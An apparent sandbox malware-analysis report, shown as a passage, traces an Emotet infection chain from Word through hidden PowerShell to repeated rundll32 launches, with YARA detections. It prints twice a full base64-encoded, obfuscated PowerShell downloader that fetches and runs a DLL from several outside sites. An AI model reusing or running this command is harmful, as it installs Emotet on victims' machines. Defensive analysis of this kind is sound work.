JwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA
                                    Imagebase:0x4a9e0000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Analysis Process: msg.exe PID: 2452 Parent PID: 2288

                                    General

                                    Start time:08:53:40
                                    Start date:06/01/2021
                                    Path:C:\Windows\System32\msg.exe
                                    Wow64 process (32bit):false
                                    Commandline:msg user /v Word experienced an error trying to open the file.
                                    Imagebase:0xff0b0000
                                    File size:26112 bytes
                                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Analysis Process: powershell.exe PID: 1100 Parent PID: 2288

                                    General

                                    Start time:08:53:40
                                    Start date:06/01/2021
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA
                                    Imagebase:0x13f0d0000
                                    File size:473600 bytes
                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2092921880.0000000000366000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2092945570.0000000001B86000.00000004.00000001.sdmp, Author: Florian Roth
                                    Reputation:high

                                    Analysis Process: rundll32.exe PID: 2312 Parent PID: 1100

                                    General

                                    Start time:08:53:43
                                    Start date:06/01/2021
                                    Path:C:\Windows\System32\rundll32.exe
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                    Imagebase:0xff970000
                                    File size:45568 bytes
                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Analysis Process: rundll32.exe PID: 2556 Parent PID: 2312

                                    General

                                    Start time:08:53:43
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2095230919.0000000000261000.00000020.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    Analysis Process: rundll32.exe PID: 2500 Parent PID: 2556

                                    General

                                    Start time:08:53:44
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2096491142.0000000000241000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2096383511.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    Analysis Process: rundll32.exe PID: 2676 Parent PID: 2500

                                    General

                                    Start time:08:53:45
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2098319985.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    Analysis Process: rundll32.exe PID: 2828 Parent PID: 2676

                                    General

                                    Start time:08:53:45
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2099670858.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    Analysis Process: rundll32.exe PID: 2724 Parent PID: 2828

                                    General

                                    Start time:08:53:46
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101060119.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101000772.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    Analysis Process: rundll32.exe PID: 2800 Parent PID: 2724

                                    General

                                    Start time:08:53:46
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101735840.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101688824.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    Analysis Process: rundll32.exe PID: 2384 Parent PID: 2800

                                    General

                                    Start time:08:53:47
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103856048.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103936335.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security

                                    Analysis Process: rundll32.exe PID: 2960 Parent PID: 2384

                                    General

                                    Start time:08:53:48
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2104856163.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2104985518.0000000000261000.00000020.00000001.sdmp, Author: Joe Security

                                    Analysis Process: rundll32.exe PID: 2948 Parent PID: 2960

                                    General

                                    Start time:08:53:48
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2106854955.0000000000470000.00000040.00000001.sdmp, Author: Joe Security

                                    Analysis Process: rundll32.exe PID: 2252 Parent PID: 2948

                                    General

                                    Start time:08:53:49
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2107302523.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2107439959.0000000000231000.00000020.00000001.sdmp, Author: Joe Security

                                    Analysis Process: rundll32.exe PID: 1748 Parent PID: 2252

                                    General

                                    Start time:08:53:50
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2108653259.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2108749500.0000000000211000.00000020.00000001.sdmp, Author: Joe Security

                                    Analysis Process: rundll32.exe PID: 1900 Parent PID: 1748

                                    General

                                    Start time:08:53:50
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2346371672.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security

                                    Analysis Process: rundll32.exe PID: 3000 Parent PID: 1900

                                    General

                                    Start time:08:53:51
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
                                    Imagebase:0x11f0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Disassembly

                                    Code Analysis

                                    Reset < >